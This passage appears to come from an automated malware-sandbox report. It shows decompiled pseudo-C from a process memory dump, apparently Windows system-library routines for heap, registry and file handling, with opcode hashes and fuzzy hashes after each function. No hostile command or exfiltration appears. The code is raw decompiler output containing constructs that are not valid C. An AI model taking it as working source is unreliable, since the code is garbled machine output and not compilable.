                                                				void* __esi;
                                                				void* _t157;
                                                				signed int _t159;
                                                				signed int _t160;
                                                				unsigned int* _t161;
                                                				intOrPtr _t165;
                                                				signed int _t172;
                                                				signed char* _t181;
                                                				intOrPtr _t189;
                                                				intOrPtr* _t200;
                                                				signed int _t202;
                                                				signed int _t203;
                                                				char _t204;
                                                				signed int _t207;
                                                				signed int _t208;
                                                				void* _t209;
                                                				intOrPtr _t210;
                                                				signed int _t212;
                                                				signed int _t214;
                                                				signed int _t221;
                                                				signed int _t222;
                                                				signed int _t226;
                                                				intOrPtr* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				intOrPtr _t237;
                                                				intOrPtr _t238;
                                                				intOrPtr _t240;
                                                				void* _t245;
                                                				signed int _t246;
                                                				signed int _t247;
                                                				void* _t248;
                                                				void* _t251;
                                                				void* _t252;
                                                				signed int _t253;
                                                				signed int _t255;
                                                				signed int _t256;
                                                
                                                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                				_v8 =  *0x16dd360 ^ _t255;
                                                				_v32 = _v32 & 0x00000000;
                                                				_t251 = __edx;
                                                				_t237 = __ecx;
                                                				_t212 = 6;
                                                				_t245 =  &_v84;
                                                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                				_v48 = __ecx;
                                                				_v36 = _t207;
                                                				_t157 = memset(_t245, 0, _t212 << 2);
                                                				_t256 = _t255 + 0xc;
                                                				_t246 = _t245 + _t212;
                                                				if(_t207 == 2) {
                                                					_t247 =  *(_t237 + 0x60);
                                                					_t208 =  *(_t237 + 0x64);
                                                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                					_v104 = _t159;
                                                					_v76 = _t159;
                                                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                					_v100 = _t160;
                                                					_v72 = _t160;
                                                					L19:
                                                					_v80 = _t208;
                                                					_v84 = _t247;
                                                					L8:
                                                					_t214 = 0;
                                                					if( *(_t237 + 0x74) > 0) {
                                                						_t82 = _t237 + 0x84; // 0x124
                                                						_t161 = _t82;
                                                						_v92 = _t161;
                                                						while( *_t161 >> 0x1f != 0) {
                                                							_t200 = _v92;
                                                							if( *_t200 == 0x80000000) {
                                                								break;
                                                							}
                                                							_t214 = _t214 + 1;
                                                							_t161 = _t200 + 0x10;
                                                							_v92 = _t161;
                                                							if(_t214 <  *(_t237 + 0x74)) {
                                                								continue;
                                                							}
                                                							goto L9;
                                                						}
                                                						_v88 = _t214 << 4;
                                                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                						_t165 = 0;
                                                						asm("adc eax, [ecx+edx+0x7c]");
                                                						_v24 = _t165;
                                                						_v28 = _v40;
                                                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                						_t221 = _v40;
                                                						_v16 =  *_v92;
                                                						_v32 =  &_v28;
                                                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                							goto L9;
                                                						}
                                                						_t240 = _v48;
                                                						if( *_v92 != 0x80000000) {
                                                							goto L9;
                                                						}
                                                						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                						_t226 = 0;
                                                						_t181 = _t251 + 0x66;
                                                						_v88 = 0;
                                                						_v92 = _t181;
                                                						do {
                                                							if( *((char*)(_t181 - 2)) == 0) {
                                                								goto L31;
                                                							}
                                                							_t226 = _v88;
                                                							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                								_t181 = E0162D0F0(1, _t226 + 0x20, 0);
                                                								_t226 = _v40;
                                                								 *(_t226 + 8) = _t181;
                                                								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                								L34:
                                                								if(_v44 == 0) {
                                                									goto L9;
                                                								}
                                                								_t210 = _v44;
                                                								_t127 = _t210 + 0x1c; // 0x1c
                                                								_t249 = _t127;
                                                								E01602280(_t181, _t127);
                                                								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                								}
                                                								_t189 = L01604620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                								if(_t189 != 0) {
                                                									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                									 *_t232 = _t232 + 0x10;
                                                									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                									E0162F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                									_t256 = _t256 + 0xc;
                                                								}
                                                								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                								E015FFFB0(_t210, _t249, _t249);
                                                								_t222 = _v76;
                                                								_t172 = _v80;
                                                								_t208 = _v84;
                                                								_t247 = _v88;
                                                								L10:
                                                								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                								_v44 = _t238;
                                                								if(_t238 != 0) {
                                                									 *0x16db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                									_v44();
                                                								}
                                                								_pop(_t248);
                                                								_pop(_t252);
                                                								_pop(_t209);
                                                								return E0162B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                							}
                                                							_t181 = _v92;
                                                							L31:
                                                							_t226 = _t226 + 1;
                                                							_t181 =  &(_t181[0x18]);
                                                							_v88 = _t226;
                                                							_v92 = _t181;
                                                						} while (_t226 < 4);
                                                						goto L34;
                                                					}
                                                					L9:
                                                					_t172 = _v104;
                                                					_t222 = _v100;
                                                					goto L10;
                                                				}
                                                				_t247 = _t246 | 0xffffffff;
                                                				_t208 = _t247;
                                                				_v84 = _t247;
                                                				_v80 = _t208;
                                                				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                					_t233 = _v72;
                                                					_v105 = _v64;
                                                					_t202 = _v76;
                                                				} else {
                                                					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                					_v105 = 1;
                                                					if(_v63 <= _t204) {
                                                						_v63 = _t204;
                                                					}
                                                					_t202 = _v76 |  *(_t251 + 0x40);
                                                					_t233 = _v72 |  *(_t251 + 0x44);
                                                					_t247 =  *(_t251 + 0x38);
                                                					_t208 =  *(_t251 + 0x3c);
                                                					_v76 = _t202;
                                                					_v72 = _t233;
                                                					_v84 = _t247;
                                                					_v80 = _t208;
                                                				}
                                                				_v104 = _t202;
                                                				_v100 = _t233;
                                                				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                					_t237 = _v48;
                                                					_v105 = 1;
                                                					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                						_t237 = _v48;
                                                					}
                                                					_t203 = _t202 |  *(_t251 + 0xb8);
                                                					_t234 = _t233 |  *(_t251 + 0xbc);
                                                					_t247 = _t247 &  *(_t251 + 0xb0);
                                                					_t208 = _t208 &  *(_t251 + 0xb4);
                                                					_v104 = _t203;
                                                					_v76 = _t203;
                                                					_v100 = _t234;
                                                					_v72 = _t234;
                                                					_v84 = _t247;
                                                					_v80 = _t208;
                                                				}
                                                				if(_v105 == 0) {
                                                					_v36 = _v36 & 0x00000000;
                                                					_t208 = 0;
                                                					_t247 = 0;
                                                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                					goto L19;
                                                				} else {
                                                					_v36 = 1;
                                                					goto L8;
                                                				}
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11324fc5c25b7ceddd6171060131a80f7445414214a794521506d293cd358db0
                                                • Instruction ID: 9dd62828e7191a0ecc8000f6610c5de593fc07d86fba857e18e566886c8a02ba
                                                • Opcode Fuzzy Hash: 11324fc5c25b7ceddd6171060131a80f7445414214a794521506d293cd358db0
                                                • Instruction Fuzzy Hash: C7C133755093818FD355CF28C880A5AFBF1BF89304F588A6EF99A8B352D770E845CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E016103E2(signed int __ecx, signed int __edx) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				char _v52;
                                                				char _v56;
                                                				char _v64;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				char* _t64;
                                                				intOrPtr _t65;
                                                				signed int _t74;
                                                				signed int _t79;
                                                				char* _t83;
                                                				intOrPtr _t84;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed char* _t95;
                                                				signed int _t99;
                                                				signed int _t100;
                                                				signed char* _t101;
                                                				signed int _t105;
                                                				signed int _t119;
                                                				signed int _t120;
                                                				void* _t122;
                                                				signed int _t123;
                                                				signed int _t127;
                                                
                                                				_v8 =  *0x16dd360 ^ _t127;
                                                				_t119 = __ecx;
                                                				_t105 = __edx;
                                                				_t118 = 0;
                                                				_v20 = __edx;
                                                				_t120 =  *(__ecx + 0x20);
                                                				if(E01610548(__ecx, 0) != 0) {
                                                					_t56 = 0xc000022d;
                                                					L23:
                                                					return E0162B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                				} else {
                                                					_v12 = _v12 | 0xffffffff;
                                                					_t58 = _t120 + 0x24;
                                                					_t109 =  *(_t120 + 0x18);
                                                					_t118 = _t58;
                                                					_v16 = _t58;
                                                					E015FB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                					_v52 = 0x18;
                                                					_v48 = 0;
                                                					0x840 = 0x40;
                                                					if( *0x16d7c1c != 0) {
                                                					}
                                                					_v40 = 0x840;
                                                					_v44 = _t105;
                                                					_v36 = 0;
                                                					_v32 = 0;
                                                					if(E01607D50() != 0) {
                                                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                					} else {
                                                						_t64 = 0x7ffe0384;
                                                					}
                                                					if( *_t64 != 0) {
                                                						_t65 =  *[fs:0x30];
                                                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                							_t100 = E01607D50();
                                                							__eflags = _t100;
                                                							if(_t100 == 0) {
                                                								_t101 = 0x7ffe0385;
                                                							} else {
                                                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                							}
                                                							__eflags =  *_t101 & 0x00000020;
                                                							if(( *_t101 & 0x00000020) != 0) {
                                                								_t118 = _t118 | 0xffffffff;
                                                								_t109 = 0x1485;
                                                								E01667016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                							}
                                                						}
                                                					}
                                                					_t105 = 0;
                                                					while(1) {
                                                						_push(0x60);
                                                						_push(5);
                                                						_push( &_v64);
                                                						_push( &_v52);
                                                						_push(0x100021);
                                                						_push( &_v12);
                                                						_t122 = E01629830();
                                                						if(_t122 >= 0) {
                                                							break;
                                                						}
                                                						__eflags = _t122 - 0xc0000034;
                                                						if(_t122 == 0xc0000034) {
                                                							L38:
                                                							_t120 = 0xc0000135;
                                                							break;
                                                						}
                                                						__eflags = _t122 - 0xc000003a;
                                                						if(_t122 == 0xc000003a) {
                                                							goto L38;
                                                						}
                                                						__eflags = _t122 - 0xc0000022;
                                                						if(_t122 != 0xc0000022) {
                                                							break;
                                                						}
                                                						__eflags = _t105;
                                                						if(__eflags != 0) {
                                                							break;
                                                						}
                                                						_t109 = _t119;
                                                						_t99 = E016669A6(_t119, __eflags);
                                                						__eflags = _t99;
                                                						if(_t99 == 0) {
                                                							break;
                                                						}
                                                						_t105 = _t105 + 1;
                                                					}
                                                					if( !_t120 >= 0) {
                                                						L22:
                                                						_t56 = _t120;
                                                						goto L23;
                                                					}
                                                					if( *0x16d7c04 != 0) {
                                                						_t118 = _v12;
                                                						_t120 = E0166A7AC(_t119, _t118, _t109);
                                                						__eflags = _t120;
                                                						if(_t120 >= 0) {
                                                							goto L10;
                                                						}
                                                						__eflags =  *0x16d7bd8;
                                                						if( *0x16d7bd8 != 0) {
                                                							L20:
                                                							if(_v12 != 0xffffffff) {
                                                								_push(_v12);
                                                								E016295D0();
                                                							}
                                                							goto L22;
                                                						}
                                                					}
                                                					L10:
                                                					_push(_v12);
                                                					_t105 = _t119 + 0xc;
                                                					_push(0x1000000);
                                                					_push(0x10);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0xf);
                                                					_push(_t105);
                                                					_t120 = E016299A0();
                                                					if(_t120 < 0) {
                                                						__eflags = _t120 - 0xc000047e;
                                                						if(_t120 == 0xc000047e) {
                                                							L51:
                                                							_t74 = E01663540(_t120);
                                                							_t119 = _v16;
                                                							_t120 = _t74;
                                                							L52:
                                                							_t118 = 0x1485;
                                                							E015EB1E1(_t120, 0x1485, 0, _t119);
                                                							goto L20;
                                                						}
                                                						__eflags = _t120 - 0xc000047f;
                                                						if(_t120 == 0xc000047f) {
                                                							goto L51;
                                                						}
                                                						__eflags = _t120 - 0xc0000462;
                                                						if(_t120 == 0xc0000462) {
                                                							goto L51;
                                                						}
                                                						_t119 = _v16;
                                                						__eflags = _t120 - 0xc0000017;
                                                						if(_t120 != 0xc0000017) {
                                                							__eflags = _t120 - 0xc000009a;
                                                							if(_t120 != 0xc000009a) {
                                                								__eflags = _t120 - 0xc000012d;
                                                								if(_t120 != 0xc000012d) {
                                                									_v28 = _t119;
                                                									_push( &_v56);
                                                									_push(1);
                                                									_v24 = _t120;
                                                									_push( &_v28);
                                                									_push(1);
                                                									_push(2);
                                                									_push(0xc000007b);
                                                									_t79 = E0162AAF0();
                                                									__eflags = _t79;
                                                									if(_t79 >= 0) {
                                                										__eflags =  *0x16d8474 - 3;
                                                										if( *0x16d8474 != 3) {
                                                											 *0x16d79dc =  *0x16d79dc + 1;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L52;
                                                					}
                                                					if(E01607D50() != 0) {
                                                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                					} else {
                                                						_t83 = 0x7ffe0384;
                                                					}
                                                					if( *_t83 != 0) {
                                                						_t84 =  *[fs:0x30];
                                                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                							_t94 = E01607D50();
                                                							__eflags = _t94;
                                                							if(_t94 == 0) {
                                                								_t95 = 0x7ffe0385;
                                                							} else {
                                                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                							}
                                                							__eflags =  *_t95 & 0x00000020;
                                                							if(( *_t95 & 0x00000020) != 0) {
                                                								E01667016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                							}
                                                						}
                                                					}
                                                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                						if( *0x16d8708 != 0) {
                                                							_t118 =  *0x7ffe0330;
                                                							_t123 =  *0x16d7b00; // 0x0
                                                							asm("ror esi, cl");
                                                							 *0x16db1e0(_v12, _v20, 0x20);
                                                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                							asm("sbb esi, esi");
                                                							_t120 =  ~_t50 & _t93;
                                                						} else {
                                                							_t120 = 0;
                                                						}
                                                					}
                                                					if( !_t120 >= 0) {
                                                						L19:
                                                						_push( *_t105);
                                                						E016295D0();
                                                						 *_t105 =  *_t105 & 0x00000000;
                                                						goto L20;
                                                					}
                                                					_t120 = E015F7F65(_t119);
                                                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                						__eflags = _t120;
                                                						if(_t120 < 0) {
                                                							goto L19;
                                                						}
                                                						 *(_t119 + 0x64) = _v12;
                                                						goto L22;
                                                					}
                                                					goto L19;
                                                				}
                                                			}









































                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94ba0fec3e7fab0642262aa0090ebc0722c4309befa184feed0846cbdaeef0f9
                                                • Instruction ID: d03db2ed36dfae1b9a873ce3481a27044b99bb28dd9bb63785abf1d2993a77e3
                                                • Opcode Fuzzy Hash: 94ba0fec3e7fab0642262aa0090ebc0722c4309befa184feed0846cbdaeef0f9
                                                • Instruction Fuzzy Hash: 2A911632E01615DFEF329A6CCC44BAD7BA5AB45724F0902A5FE10AB3D5EB749C80C785
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E015EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                				signed int _v8;
                                                				char _v1036;
                                                				signed int _v1040;
                                                				char _v1048;
                                                				signed int _v1052;
                                                				signed char _v1056;
                                                				void* _v1058;
                                                				char _v1060;
                                                				signed int _v1064;
                                                				void* _v1068;
                                                				intOrPtr _v1072;
                                                				void* _v1084;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr _t70;
                                                				intOrPtr _t72;
                                                				signed int _t74;
                                                				intOrPtr _t77;
                                                				signed int _t78;
                                                				signed int _t81;
                                                				void* _t101;
                                                				signed int _t102;
                                                				signed int _t107;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				signed char _t111;
                                                				signed int _t112;
                                                				signed int _t113;
                                                				signed int _t114;
                                                				intOrPtr _t116;
                                                				void* _t117;
                                                				char _t118;
                                                				void* _t120;
                                                				char _t121;
                                                				signed int _t122;
                                                				signed int _t123;
                                                				signed int _t125;
                                                
                                                				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                				_v8 =  *0x16dd360 ^ _t125;
                                                				_t116 = _a4;
                                                				_v1056 = _a16;
                                                				_v1040 = _a24;
                                                				if(E015F6D30( &_v1048, _a8) < 0) {
                                                					L4:
                                                					_pop(_t117);
                                                					_pop(_t120);
                                                					_pop(_t101);
                                                					return E0162B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                				}
                                                				_t70 = _a20;
                                                				if(_t70 >= 0x3f4) {
                                                					_t121 = _t70 + 0xc;
                                                					L19:
                                                					_t107 =  *( *[fs:0x30] + 0x18);
                                                					__eflags = _t107;
                                                					if(_t107 == 0) {
                                                						L60:
                                                						_t68 = 0xc0000017;
                                                						goto L4;
                                                					}
                                                					_t72 =  *0x16d7b9c; // 0x0
                                                					_t74 = L01604620(_t107, _t107, _t72 + 0x180000, _t121);
                                                					_v1064 = _t74;
                                                					__eflags = _t74;
                                                					if(_t74 == 0) {
                                                						goto L60;
                                                					}
                                                					_t102 = _t74;
                                                					_push( &_v1060);
                                                					_push(_t121);
                                                					_push(_t74);
                                                					_push(2);
                                                					_push( &_v1048);
                                                					_push(_t116);
                                                					_t122 = E01629650();
                                                					__eflags = _t122;
                                                					if(_t122 >= 0) {
                                                						L7:
                                                						_t114 = _a12;
                                                						__eflags = _t114;
                                                						if(_t114 != 0) {
                                                							_t77 = _a20;
                                                							L26:
                                                							_t109 =  *(_t102 + 4);
                                                							__eflags = _t109 - 3;
                                                							if(_t109 == 3) {
                                                								L55:
                                                								__eflags = _t114 - _t109;
                                                								if(_t114 != _t109) {
                                                									L59:
                                                									_t122 = 0xc0000024;
                                                									L15:
                                                									_t78 = _v1052;
                                                									__eflags = _t78;
                                                									if(_t78 != 0) {
                                                										L016077F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                									}
                                                									_t68 = _t122;
                                                									goto L4;
                                                								}
                                                								_t110 = _v1056;
                                                								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                								_v1060 = _t118;
                                                								__eflags = _t110;
                                                								if(_t110 == 0) {
                                                									L10:
                                                									_t122 = 0x80000005;
                                                									L11:
                                                									_t81 = _v1040;
                                                									__eflags = _t81;
                                                									if(_t81 == 0) {
                                                										goto L15;
                                                									}
                                                									__eflags = _t122;
                                                									if(_t122 >= 0) {
                                                										L14:
                                                										 *_t81 = _t118;
                                                										goto L15;
                                                									}
                                                									__eflags = _t122 - 0x80000005;
                                                									if(_t122 != 0x80000005) {
                                                										goto L15;
                                                									}
                                                									goto L14;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                									goto L10;
                                                								}
                                                								_push( *((intOrPtr*)(_t102 + 8)));
                                                								_t59 = _t102 + 0xc; // 0xc
                                                								_push(_t110);
                                                								L54:
                                                								E0162F3E0();
                                                								_t125 = _t125 + 0xc;
                                                								goto L11;
                                                							}
                                                							__eflags = _t109 - 7;
                                                							if(_t109 == 7) {
                                                								goto L55;
                                                							}
                                                							_t118 = 4;
                                                							__eflags = _t109 - _t118;
                                                							if(_t109 != _t118) {
                                                								__eflags = _t109 - 0xb;
                                                								if(_t109 != 0xb) {
                                                									__eflags = _t109 - 1;
                                                									if(_t109 == 1) {
                                                										__eflags = _t114 - _t118;
                                                										if(_t114 != _t118) {
                                                											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                											_v1060 = _t118;
                                                											__eflags = _t118 - _t77;
                                                											if(_t118 > _t77) {
                                                												goto L10;
                                                											}
                                                											_push(_t118);
                                                											_t56 = _t102 + 0xc; // 0xc
                                                											_push(_v1056);
                                                											goto L54;
                                                										}
                                                										__eflags = _t77 - _t118;
                                                										if(_t77 != _t118) {
                                                											L34:
                                                											_t122 = 0xc0000004;
                                                											goto L15;
                                                										}
                                                										_t111 = _v1056;
                                                										__eflags = _t111 & 0x00000003;
                                                										if((_t111 & 0x00000003) == 0) {
                                                											_v1060 = _t118;
                                                											__eflags = _t111;
                                                											if(__eflags == 0) {
                                                												goto L10;
                                                											}
                                                											_t42 = _t102 + 0xc; // 0xc
                                                											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                											_push(_t111);
                                                											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                											_push(0);
                                                											_push( &_v1048);
                                                											_t122 = E016213C0(_t102, _t118, _t122, __eflags);
                                                											L44:
                                                											_t118 = _v1072;
                                                											goto L11;
                                                										}
                                                										_t122 = 0x80000002;
                                                										goto L15;
                                                									}
                                                									_t122 = 0xc0000024;
                                                									goto L44;
                                                								}
                                                								__eflags = _t114 - _t109;
                                                								if(_t114 != _t109) {
                                                									goto L59;
                                                								}
                                                								_t118 = 8;
                                                								__eflags = _t77 - _t118;
                                                								if(_t77 != _t118) {
                                                									goto L34;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                									goto L34;
                                                								}
                                                								_t112 = _v1056;
                                                								_v1060 = _t118;
                                                								__eflags = _t112;
                                                								if(_t112 == 0) {
                                                									goto L10;
                                                								}
                                                								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                								goto L11;
                                                							}
                                                							__eflags = _t114 - _t118;
                                                							if(_t114 != _t118) {
                                                								goto L59;
                                                							}
                                                							__eflags = _t77 - _t118;
                                                							if(_t77 != _t118) {
                                                								goto L34;
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                								goto L34;
                                                							}
                                                							_t113 = _v1056;
                                                							_v1060 = _t118;
                                                							__eflags = _t113;
                                                							if(_t113 == 0) {
                                                								goto L10;
                                                							}
                                                							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                							goto L11;
                                                						}
                                                						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                						__eflags = _t118 - _a20;
                                                						if(_t118 <= _a20) {
                                                							_t114 =  *(_t102 + 4);
                                                							_t77 = _t118;
                                                							goto L26;
                                                						}
                                                						_v1060 = _t118;
                                                						goto L10;
                                                					}
                                                					__eflags = _t122 - 0x80000005;
                                                					if(_t122 != 0x80000005) {
                                                						goto L15;
                                                					}
                                                					L016077F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                					L18:
                                                					_t121 = _v1060;
                                                					goto L19;
                                                				}
                                                				_push( &_v1060);
                                                				_push(0x400);
                                                				_t102 =  &_v1036;
                                                				_push(_t102);
                                                				_push(2);
                                                				_push( &_v1048);
                                                				_push(_t116);
                                                				_t122 = E01629650();
                                                				if(_t122 >= 0) {
                                                					__eflags = 0;
                                                					_v1052 = 0;
                                                					goto L7;
                                                				}
                                                				if(_t122 == 0x80000005) {
                                                					goto L18;
                                                				}
                                                				goto L4;
                                                 			}

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4d3d0cf4179f841430cb09f43cd87ac543a4dad30ddc3959017bd614759774e
                                                • Instruction ID: 127dccbb9ec541d414ae5387559aae947e5557f955271d15753a23b53934dbd9
                                                • Opcode Fuzzy Hash: d4d3d0cf4179f841430cb09f43cd87ac543a4dad30ddc3959017bd614759774e
                                                • Instruction Fuzzy Hash: E181BE766442468BDB66CE58CC80E3BB7E9FB84350F54486EEE459B341E330ED41CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E01666DC9(signed int __ecx, void* __edx) {
                                                				unsigned int _v8;
                                                				intOrPtr _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				char _v56;
                                                				char _v60;
                                                				void* _t87;
                                                				void* _t95;
                                                				signed char* _t96;
                                                				signed int _t107;
                                                				signed int _t136;
                                                				signed char* _t137;
                                                				void* _t157;
                                                				void* _t161;
                                                				void* _t167;
                                                				intOrPtr _t168;
                                                				void* _t174;
                                                				void* _t175;
                                                				signed int _t176;
                                                				void* _t177;
                                                
                                                				_t136 = __ecx;
                                                				_v44 = 0;
                                                				_t167 = __edx;
                                                				_v40 = 0;
                                                				_v36 = 0;
                                                				_v32 = 0;
                                                				_v60 = 0;
                                                				_v56 = 0;
                                                				_v52 = 0;
                                                				_v48 = 0;
                                                				_v16 = __ecx;
                                                				_t87 = L01604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                				_t175 = _t87;
                                                				if(_t175 != 0) {
                                                					_t11 = _t175 + 0x30; // 0x30
                                                					 *((short*)(_t175 + 6)) = 0x14d4;
                                                					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                					E01666B4C(_t167, _t11, 0x214,  &_v8);
                                                					_v12 = _v8 + 0x10;
                                                					_t95 = E01607D50();
                                                					_t137 = 0x7ffe0384;
                                                					if(_t95 == 0) {
                                                						_t96 = 0x7ffe0384;
                                                					} else {
                                                						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                					}
                                                					_push(_t175);
                                                					_push(_v12);
                                                					_push(0x402);
                                                					_push( *_t96 & 0x000000ff);
                                                					E01629AE0();
                                                					_t87 = L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                					_t176 = _v16;
                                                					if((_t176 & 0x00000100) != 0) {
                                                						_push( &_v36);
                                                						_t157 = 4;
                                                						_t87 = E0166795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                						if(_t87 >= 0) {
                                                							_v24 = E0166795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                							_v28 = E0166795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                							_push( &_v52);
                                                							_t161 = 5;
                                                							_t168 = E0166795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                							_v20 = _t168;
                                                							_t107 = L01604620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                							_v16 = _t107;
                                                							if(_t107 != 0) {
                                                								_v8 = _v8 & 0x00000000;
                                                								 *(_t107 + 0x20) = _t176;
                                                								 *((short*)(_t107 + 6)) = 0x14d5;
